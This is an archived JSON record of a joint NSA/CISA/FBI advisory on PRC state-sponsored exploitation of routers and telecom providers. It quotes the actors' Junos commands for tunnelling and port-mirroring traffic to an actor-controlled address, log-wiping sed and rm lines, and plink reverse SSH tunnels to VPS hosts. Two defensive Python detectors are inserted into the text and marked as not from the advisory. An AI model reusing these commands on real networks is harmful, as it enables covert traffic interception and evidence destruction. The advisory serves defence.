{
	"id": "0239c271-3333-40a0-91f9-59e19a18d4d5",
	"created_at": "2026-04-06T00:20:09.608603Z",
	"updated_at": "2026-04-10T13:12:01.641331Z",
	"deleted_at": null,
	"sha1_hash": "a0f19efc809a407c598cf6c6396dc210d1a00f72",
	"title": "People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 160783,
	"plain_text": "People’s Republic of China State-Sponsored Cyber Actors Exploit\r\nNetwork Providers and Devices | CISA\r\nPublished: 2022-06-10 · Archived: 2026-04-05 21:44:11 UTC\r\nSummary\r\nBest Practices\r\n• Apply patches as soon as possible\r\n• Disable unnecessary ports and protocols\r\n• Replace end-of-life infrastructure\r\n• Implement a centralized patch management system\r\nThis joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber\r\nactors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised\r\ninfrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private\r\nsector organizations. The advisory details the targeting and compromise of major telecommunications companies and\r\nnetwork service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—\r\nassociated with network devices routinely exploited by the cyber actors since 2020.\r\nThis joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and\r\nInfrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA,\r\nand FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI),\r\nincluding the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics,\r\ntechniques, and procedures (TTPs).\r\nEntities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing\r\nend-of-life infrastructure, and implementing a centralized patch management program.\r\nNSA, CISA, and the FBI urge U.S. 
and allied governments, CI, and private industry organizations to apply the\r\nrecommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and\r\nreduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.\r\nFor more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and\r\nAdvisories webpage.\r\nCommon vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors\r\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network\r\ndevices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as\r\nadditional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on\r\nother entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors\r\nwith the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often\r\noverlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing\r\nservices and endpoint devices.\r\nSince 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified\r\nsecurity vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors\r\nto gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services\r\n[T1133] or public-facing applications [T1190]—without using their own distinctive or identifying malware—so long\r\nas the actors acted before victim organizations updated their systems. 
\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 1 of 17\n\nPRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points\r\nfrom numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs).\r\nThe cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers.\r\nThey use these servers to register and access operational email accounts, host C2 domains, and interact with victim\r\nnetworks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.\r\nThese cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have\r\nobserved state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their\r\nongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately\r\nfollowing the release of information related to their ongoing campaigns. 
PRC state-sponsored cyber actors often mix their\r\ncustomized toolset with publicly available tools, especially by leveraging tools that are native to the network environment,\r\nto obscure their activity by blending into the noise or normal activity of a network.\r\nNSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network\r\ndevice CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.\r\nTable 1: Top network device CVEs exploited by PRC state-sponsored cyber actors\r\nVendor     CVE              Vulnerability Type\r\nCisco      CVE-2018-0171    Remote Code Execution (RCE)\r\nCisco      CVE-2019-15271   RCE\r\nCisco      CVE-2019-1652    RCE\r\nCitrix     CVE-2019-19781   RCE\r\nDrayTek    CVE-2020-8515    RCE\r\nD-Link     CVE-2019-16920   RCE\r\nFortinet   CVE-2018-13382   Authentication Bypass\r\nMikroTik   CVE-2018-14847   Authentication Bypass\r\nNetgear    CVE-2017-6862    RCE\r\nPulse      CVE-2019-11510   Authentication Bypass\r\nPulse      CVE-2021-22893   RCE\r\nQNAP       CVE-2019-7192    Privilege Elevation\r\nQNAP       CVE-2019-7193    Remote Inject\r\nQNAP       CVE-2019-7194    XML Routing Detour Attack\r\nQNAP       CVE-2019-7195    XML Routing Detour Attack\r\nZyxel      CVE-2020-29583   Authentication Bypass\r\nTelecommunications and network service provider targeting\r\nPRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The\r\nactors have utilized open-source router-specific software frameworks, RouterSploit and RouterScan [T1595.002], to\r\nidentify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is\r\nan open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool for scanning\r\nranges of IP addresses for vulnerable devices. 
These tools enable exploitation of SOHO and other routers manufactured\r\nby major industry providers, including Cisco, Fortinet, and MikroTik.\r\nUpon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored\r\ncyber actors have identified critical users and infrastructure, including systems critical to maintaining the security of\r\nauthentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service\r\n(RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database\r\n[T1078] and utilized SQL commands to dump the credentials [T1555], which contained both cleartext and hashed\r\npasswords for user and administrative accounts. \r\nHaving gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom\r\nautomated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119].\r\nThese scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current\r\nconfiguration of each router. After successfully capturing the command output, these configurations were exfiltrated off\r\nnetwork to the actor’s infrastructure [TA0010]. 
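The scripted, credentialed configuration collection described above leaves a distinctive trace in device syslog: one account reads the configuration of many routers within minutes. The following Python is an added example, not code from the advisory: it parses command-accounting lines modelled on Junos UI_CMDLINE_READ_LINE and Cisco IOS PARSER-5-CMDLOG messages and flags any user who pulls configuration from at least five distinct devices inside a ten-minute window. The log lines, hostnames, usernames and thresholds are constructed for the example.

```python
# Added example (not from the advisory). Flags one account reading running
# configuration from many network devices in a short window, which is the
# footprint of the scripted SSH collection the advisory describes.
# The message formats are modelled on Junos mgd (UI_CMDLINE_READ_LINE) and
# Cisco IOS command accounting (%PARSER-5-CMDLOG); the hosts, users and
# timestamps below are constructed for the example.
from collections import defaultdict
from datetime import datetime, timedelta

QUOTE = chr(39)  # the single-quote character Junos wraps user and command in

CONFIG_READ_PREFIXES = ('show configuration', 'show running-config', 'show run')

CONSTRUCTED_SYSLOG = '''
2022-05-01T10:00:01 rtr-core-1 mgd[2111]: UI_CMDLINE_READ_LINE: User 'svc-radius', command 'show configuration | display set '
2022-05-01T10:00:09 rtr-core-2 mgd[2112]: UI_CMDLINE_READ_LINE: User 'svc-radius', command 'show configuration | display set '
2022-05-01T10:00:17 rtr-core-3 mgd[2113]: UI_CMDLINE_READ_LINE: User 'svc-radius', command 'show configuration | display set '
2022-05-01T10:00:26 rtr-core-4 mgd[2114]: UI_CMDLINE_READ_LINE: User 'svc-radius', command 'show configuration | display set '
2022-05-01T10:00:34 sw-agg-1 %PARSER-5-CMDLOG: User:svc-radius  logged command:show running-config
2022-05-01T10:00:41 sw-agg-2 %PARSER-5-CMDLOG: User:svc-radius  logged command:show running-config
2022-05-01T09:15:00 rtr-core-1 mgd[2050]: UI_CMDLINE_READ_LINE: User 'netops-jane', command 'show configuration interfaces ge-0/0/0 '
2022-05-01T11:40:00 rtr-core-2 mgd[2200]: UI_CMDLINE_READ_LINE: User 'netops-jane', command 'show interfaces terse '
'''.strip().splitlines()


def parse_line(line):
    '''Return (timestamp, device, user, command) for a recognised
    command-accounting line, or None for anything else.'''
    try:
        ts, host, rest = line.split(' ', 2)
        when = datetime.fromisoformat(ts)
    except ValueError:
        return None
    if 'UI_CMDLINE_READ_LINE: User ' in rest:
        # Junos: ... UI_CMDLINE_READ_LINE: User 'name', command 'text '
        body = rest.partition('UI_CMDLINE_READ_LINE: User ')[2]
        user = body.partition(QUOTE)[2].partition(QUOTE)[0]
        command = body.partition('command ' + QUOTE)[2].rpartition(QUOTE)[0]
        return when, host, user, command.strip()
    if '%PARSER-5-CMDLOG: User:' in rest:
        # Cisco IOS: ... %PARSER-5-CMDLOG: User:name  logged command:text
        body = rest.partition('%PARSER-5-CMDLOG: User:')[2]
        user, _, command = body.partition('logged command:')
        return when, host, user.strip(), command.strip()
    return None


def flag_bulk_config_reads(lines, window=timedelta(minutes=10), min_devices=5):
    '''Report {user: sorted device list} for every user who read configuration
    from at least min_devices distinct devices inside any window-long span.'''
    reads = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        when, host, user, command = parsed
        if command.startswith(CONFIG_READ_PREFIXES):
            reads[user].append((when, host))
    findings = {}
    for user, events in reads.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            hosts = {host for when, host in events[i:] if when - start <= window}
            if len(hosts) >= min_devices:
                findings[user] = sorted(hosts)
                break
    return findings


if __name__ == '__main__':
    for user, hosts in flag_bulk_config_reads(CONSTRUCTED_SYSLOG).items():
        print(user, 'read configuration from', len(hosts), 'devices:', ', '.join(hosts))
```

The window and device count are the knobs to tune against normal automation (backup jobs, NMS pollers): put those service accounts on an allow-list rather than raising the threshold, because the actors here used a legitimate account harvested from RADIUS.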
The cyber actors likely used additional scripting to further automate the\r\nexploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of\r\nrouter configurations that would be necessary to successfully manipulate traffic within the network.\r\nArmed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber\r\nactors returned to the network and used their access and knowledge to successfully authenticate and execute router\r\ncommands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure. \r\nWhile other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper\r\nrouter to perform initial tunnel configuration for eventual exfiltration out of the network:\r\nset chassis fpc \u003cslot number\u003e pic \u003cuser defined value\u003e tunnel-services bandwidth \u003cuser defined value\u003e\r\nset chassis network-services all-ethernet\r\nset interfaces \u003cinterface-id\u003e unit \u003cunit number\u003e tunnel source \u003clocal network IP address\u003e\r\nset interfaces \u003cinterface-id\u003e unit \u003cunit number\u003e tunnel destination \u003cactor controlled IP address\u003e\r\n \r\nAfter establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to\r\nroute traffic to actor-controlled infrastructure.\r\nset interfaces \u003cinterface-id\u003e unit \u003cunit number\u003e family inet address \u003clocal network IP address subnet\u003e\r\nset routing-options static route \u003clocal network IP address\u003e next-hop \u003cactor controlled IP address\u003e\r\n \r\nPRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was\r\nsubsequently forwarded through the tunnel out of the network to actor-controlled 
infrastructure. \r\nset firewall family inet filter \u003cfilter name\u003e term \u003cfilter variable\u003e then port-mirror\r\nset forwarding-options port-mirroring input rate 1\r\nset forwarding-options port-mirroring family inet output interface \u003cinterface-id\u003e next-hop \u003clocal network IP address\u003e\r\nset forwarding-options port-mirroring family inet output no-filter-check\r\nset interfaces \u003cinterface-id\u003e unit \u003cunit number\u003e family inet filter input \u003cfilter name\u003e\r\nset interfaces \u003cinterface-id\u003e unit \u003cunit number\u003e family inet filter output \u003cfilter name\u003e\r\n \r\nHaving completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy\r\nevidence of their activity to further obfuscate their presence and evade detection.\r\nsed -i -e '/\u003cREGEX\u003e/d' \u003clog filepath 1\u003e\r\nsed -i -e '/\u003cREGEX\u003e/d' \u003clog filepath 2\u003e\r\nsed -i -e '/\u003cREGEX\u003e/d' \u003clog filepath 3\u003e\r\nrm -f \u003clog filepath 4\u003e\r\nrm -f \u003clog filepath 5\u003e\r\nrm -f \u003clog filepath 6\u003e\r\n \r\nPRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH\r\ntunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. 
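The Junos statements above double as a checklist a defender can run against their own configurations, because the actors' changes survive the log wiping: they are still in the running configuration. The following Python is an added example, not part of the advisory: it reads a configuration in 'show configuration | display set' form and reports tunnel destinations and static-route next hops that fall outside the organisation's own address space, port-mirror actions in firewall filters, port-mirroring settings under forwarding-options, and the interfaces to which a mirroring filter is applied. The configuration text, the 10.0.0.0/8 and 172.16.0.0/12 internal prefixes, and the 203.0.113.7 destination are constructed for the example.

```python
# Added example (not from the advisory). Audits a Junos configuration in
# 'display set' form for the traffic-diversion pattern described in the
# advisory: a tunnel to an outside address, a static route that sends
# internal traffic to that address, and port mirroring that copies traffic
# into the tunnel. The configuration and the address ranges are constructed
# for the example; a real audit would take INTERNAL_PREFIXES from its own
# address plan.
import ipaddress
from collections import defaultdict

INTERNAL_PREFIXES = [ipaddress.ip_network('10.0.0.0/8'), ipaddress.ip_network('172.16.0.0/12')]

CONSTRUCTED_CONFIG = '''
set chassis fpc 0 pic 0 tunnel-services bandwidth 1g
set chassis network-services all-ethernet
set interfaces gr-0/0/0 unit 0 tunnel source 10.20.0.1
set interfaces gr-0/0/0 unit 0 tunnel destination 203.0.113.7
set interfaces gr-0/0/0 unit 0 family inet address 10.250.0.1/30
set interfaces ge-0/0/1 unit 0 family inet address 10.20.0.1/24
set interfaces ge-0/0/1 unit 0 family inet filter input MIRROR-ALL
set interfaces ge-0/0/1 unit 0 family inet filter output MIRROR-ALL
set routing-options static route 0.0.0.0/0 next-hop 10.20.0.254
set routing-options static route 10.30.0.0/16 next-hop 203.0.113.7
set firewall family inet filter MIRROR-ALL term 1 then port-mirror
set firewall family inet filter MIRROR-ALL term 1 then accept
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface gr-0/0/0.0 next-hop 10.250.0.2
set forwarding-options port-mirroring family inet output no-filter-check
'''


def is_internal(address):
    '''True when the address lies inside one of the organisation's own prefixes.'''
    ip = ipaddress.ip_address(address)
    return any(ip in net for net in INTERNAL_PREFIXES)


def audit_junos_set_config(config_text):
    '''Return {category: [offending set statements]}; an empty dict is a clean config.'''
    findings = defaultdict(list)
    mirroring_filters = set()
    statements = [line.split() for line in config_text.strip().splitlines()]
    for words in statements:
        if len(words) < 2 or words[0] != 'set':
            continue
        stmt = words[1:]
        if stmt[0] == 'interfaces' and 'tunnel' in stmt and 'destination' in stmt:
            # set interfaces <ifd> unit <n> tunnel destination <ip>
            if not is_internal(stmt[-1]):
                findings['tunnel-to-external'].append(' '.join(words))
        elif stmt[:3] == ['routing-options', 'static', 'route'] and 'next-hop' in stmt:
            # set routing-options static route <prefix> next-hop <ip>
            if not is_internal(stmt[stmt.index('next-hop') + 1]):
                findings['static-route-external-next-hop'].append(' '.join(words))
        elif stmt[0] == 'firewall' and stmt[-1] == 'port-mirror':
            # set firewall family inet filter <name> term <t> then port-mirror
            mirroring_filters.add(stmt[stmt.index('filter') + 1])
            findings['port-mirror-action'].append(' '.join(words))
        elif stmt[:2] == ['forwarding-options', 'port-mirroring']:
            findings['port-mirroring-config'].append(' '.join(words))
    # second pass: which interfaces actually carry a mirroring filter
    for words in statements:
        if len(words) > 2 and words[1] == 'interfaces' and 'filter' in words and words[-1] in mirroring_filters:
            findings['mirroring-filter-applied'].append(' '.join(words))
    return dict(findings)


if __name__ == '__main__':
    for category, lines in audit_junos_set_config(CONSTRUCTED_CONFIG).items():
        print(category)
        for line in lines:
            print('   ', line)
```

Run this against a configuration pulled over the out-of-band management path, not one returned by the device through the same in-band session the actor may control, and compare the result with the last known-good backup: port mirroring into a tunnel interface has almost no legitimate use on a production edge router.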
These actors often\r\nconducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer\r\nprotocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.\r\nplink.exe -N -R \u003clocal port\u003e:\u003chost 1\u003e:\u003cremote port\u003e -pw \u003cuser defined password\u003e -batch root@\u003cVPS1\u003e -P \u003cremote SSH port\u003e\r\nplink.exe -N -R \u003clocal port\u003e:\u003chost 2\u003e:\u003cremote port\u003e -pw \u003cuser defined password\u003e -batch root@\u003cVPS2\u003e -P \u003cremote SSH port\u003e\r\n \r\nMitigations\r\nNSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection\r\nrecommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have\r\nspecific additional mitigations below, the following mitigations generally apply:\r\n• Keep systems and products updated and patched as soon as possible after patches are released [D3-SU]. Consider\r\nleveraging a centralized patch management system to automate and expedite the process.\r\n• Immediately remove or isolate suspected compromised devices from the network [D3-ITF] [D3-OTF].\r\n• Segment networks to limit or block lateral movement [D3-NI].\r\n• Disable unused or unnecessary network services, ports, protocols, and devices [D3-ACH] [D3-ITF] [D3-OTF].\r\n• Enforce multifactor authentication (MFA) for all users, without exception [D3-MFA].\r\n• Enforce MFA on all VPN connections [D3-MFA]. If MFA is unavailable, enforce password complexity\r\nrequirements [D3-SPP].\r\n• Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency,\r\nand performing regular account reviews to ensure compliance [D3-SPP].\r\n• Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures.\r\n• Disable external management capabilities and set up an out-of-band management network [D3-NI].\r\n• Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal\r\nnetwork [D3-NI].\r\n• Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [D3-NTA] [D3-PM].\r\n• Ensure that you have dedicated management systems [D3-PH] and accounts for system administrators. Protect\r\nthese accounts with strict network policies [D3-UAP].\r\n• Enable robust logging and review of network infrastructure accesses, configuration changes, and critical\r\ninfrastructure services performing authentication, authorization, and accounting functions [D3-PM].\r\n• Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network\r\ninfrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective\r\nactions commensurate with their findings.\r\nResources\r\nRefer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance\r\nfor previous reporting on People’s Republic of China state-sponsored malicious cyber activity.\r\nU.S. government and critical infrastructure organizations should consider signing up for CISA’s cyber hygiene services,\r\nincluding vulnerability scanning, to help reduce exposure to threats.\r\nU.S. 
Defense Industrial Base (DIB) organizations should consider signing up for the NSA Cybersecurity Collaboration\r\nCenter’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability\r\nscanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these\r\nservices, email dib_defense@cyber.nsa.gov.\r\nAdditional References\r\nCISA (2022), Weak Security Controls and Practices Routinely Exploited for Initial Access.\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-137a\r\nCISA (2022), 2021 Top Routinely Exploited Vulnerabilities. https://www.cisa.gov/uscert/ncas/alerts/aa22-117a\r\nNSA (2021),   Selecting and Hardening Remote Access VPN Solutions.\r\nhttps://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF\r\nNSA (2021), Chinese State-Sponsored Cyber Operations: Observed TTPs.\r\nhttps://media.defense.gov/2021/Jul/19/2002805003/-1/-1/0/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF\r\nCISA (2021), Exploitation of Pulse Connect Secure Vulnerabilities. 
https://www.cisa.gov/uscert/ncas/alerts/aa21-110a\r\nNSA (2020), Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities.\r\nhttps://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF\r\nCISA (2020), Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity.\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa20-258a\r\nNSA (2020), Performing Out-of-Band Network Management.\r\nhttps://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT202\r\nCISA (2020), Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP.\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa20-020a\r\nNSA (2019), Mitigating Recent VPN Vulnerabilities.\r\nhttps://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf\r\nNSA (2019), Update and Upgrade Software Immediately.\r\nhttps://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf\r\nContact Information\r\nTo report incidents and anomalous activity or to request incident response resources or technical assistance related to these\r\nthreats, contact CISA at report@cisa.gov. To report computer intrusion or cybercrime activity related to information found\r\nin this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937\r\nor by email at CyWatch@fbi.gov. For NSA client requirements or general cybersecurity inquiries, contact\r\nCybersecurity_Requests@nsa.gov. 
\r\nMedia Inquiries / Press Desk:\r\nNSA Media Relations, 443-634-0721, MediaRelations@nsa.gov\r\nCISA Media Relations, 703-235-2010, CISAMedia@cisa.dhs.gov\r\nFBI National Press Office, 202-324-3691, npo@fbi.gov\r\nDisclaimer of endorsement\r\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees.\r\nReference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or\r\notherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and\r\nthis guidance shall not be used for advertising or product endorsement purposes.\r\nPurpose\r\nThis advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions,\r\nincluding their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be\r\nshared broadly to reach all appropriate stakeholders.\r\nAppendix A: Vulnerabilities\r\nTable 2: Information on Cisco CVE-2018-0171\r\nCisco CVE-2018-0171          CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description\r\nA vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an\r\nunauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS)\r\ncondition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet\r\ndata. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on\r\nTCP port 4786. 
A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which\r\ncould have the following impacts:\r\n• Triggering a reload of the device\r\n• Allowing the attacker to execute arbitrary code on the device\r\n• Causing an indefinite loop on the affected device that triggers a watchdog crash\r\nRecommended Mitigations\r\nCisco has released software updates that address this vulnerability.\r\nIn addition, disabling the Cisco Smart Install feature is highly recommended to reduce exposure.\r\nDetection Methods\r\nCisco IOS Software Checker\r\nVulnerable Technologies and Versions\r\nThe vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS or IOS XE software and have\r\nthe Smart Install client feature enabled. Only Smart Install client switches are affected by the vulnerability described in\r\nthis advisory.\r\nReferences\r\nhttp://www.securityfocus.com/bid/103538\r\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2\r\nhttps://ics-cert.us-cert.gov/advisories/ICSA-18-107-04\r\nhttps://ics-cert.us-cert.gov/advisories/ICSA-18-107-05\r\nhttps://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490\r\nhttp://www.securitytracker.com/id/1040580\r\nTable 3: Information on Cisco CVE-2019-15271\r\nCisco CVE-2019-15271          CVSS 3.0: 8.8 (High)\r\nVulnerability Description\r\nA vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow\r\nan authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a\r\nvalid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. 
An\r\nattacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of\r\nthe targeted device. A successful exploit could allow the attacker to execute commands with root privileges.\r\nRecommended Mitigations\r\nCisco has released free software updates that address the vulnerability described in this advisory.\r\nCisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN\r\nRouter and RV042G Dual Gigabit WAN VPN Router.\r\nAdministrators can reduce the attack surface by disabling the Remote Management feature if there is no\r\noperational requirement to use it. Note that the feature is disabled by default.\r\nDetection Methods\r\nN/A\r\nVulnerable Technologies and Versions\r\nThis vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release\r\nearlier than 4.2.3.10:\r\nRV016 Multi-WAN VPN Router\r\nRV042 Dual WAN VPN Router\r\nRV042G Dual Gigabit WAN VPN Router\r\nRV082 Dual WAN VPN Router\r\nReferences\r\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x\r\nTable 4: Information on Cisco CVE-2019-1652\r\nCisco CVE-2019-1652          CVSS 3.0: 7.2 (High)\r\nVulnerability Description\r\nA vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN\r\nVPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to\r\nexecute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. 
An attacker could\r\nexploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an\r\naffected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux\r\nshell as root. Cisco has released firmware updates that address this vulnerability.\r\nRecommended Mitigations\r\nCisco has released free software updates that address the vulnerability described in this advisory.\r\nThis vulnerability is fixed in RV320 and RV325 Dual Gigabit WAN VPN Routers Firmware Release 1.4.2.22 and\r\nlater.\r\nIf the Remote Management feature is enabled, Cisco recommends disabling it to reduce exposure.\r\nDetection Methods\r\nN/A\r\nVulnerable Technologies and Versions\r\nThis vulnerability affects Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers running firmware\r\nreleases 1.4.2.15 through 1.4.2.20.\r\nReferences\r\nhttp://www.securityfocus.com/bid/106728\r\nhttps://seclists.org/bugtraq/2019/Mar/55\r\nhttps://www.exploit-db.com/exploits/46243/\r\nhttps://www.exploit-db.com/exploits/46655/\r\nhttp://seclists.org/fulldisclosure/2019/Mar/61\r\nhttp://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html\r\nhttp://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html\r\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject\r\nTable 5: Information on Citrix CVE-2019-19781\r\nCitrix CVE-2019-19781          CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description\r\nAn issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0.\r\nThey allow Directory Traversal.\r\nRecommended Mitigations\r\nImplement the appropriate 
update according to the vulnerability details outlined by the vendor: Citrix: Mitigation\r\nSteps for CVE-2019-19781.\r\nIf possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).\r\nDetection Methods\r\nCISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for\r\nsusceptibility to CVE-2019-19781.\r\nNmap developed a script that can be used with the port scanning engine: CVE-2019-19781 – Citrix ADC Path\r\nTraversal #1893.\r\nCitrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781:\r\nCitrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.\r\nCVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA)\r\nprovides guidance on detecting and preventing web shell malware at\r\nhttps://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF and signatures at https://github.com/nsacyber/Mitigating-Web-Shells.\r\nVulnerable Technologies and Versions\r\nThe vulnerability affects the following Citrix product versions on all supported platforms:\r\nCitrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24\r\nNetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18\r\nNetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13\r\nNetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15\r\nNetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12\r\nCitrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported\r\nsoftware release builds before 10.2.6b and 11.0.3b\r\nReferences 
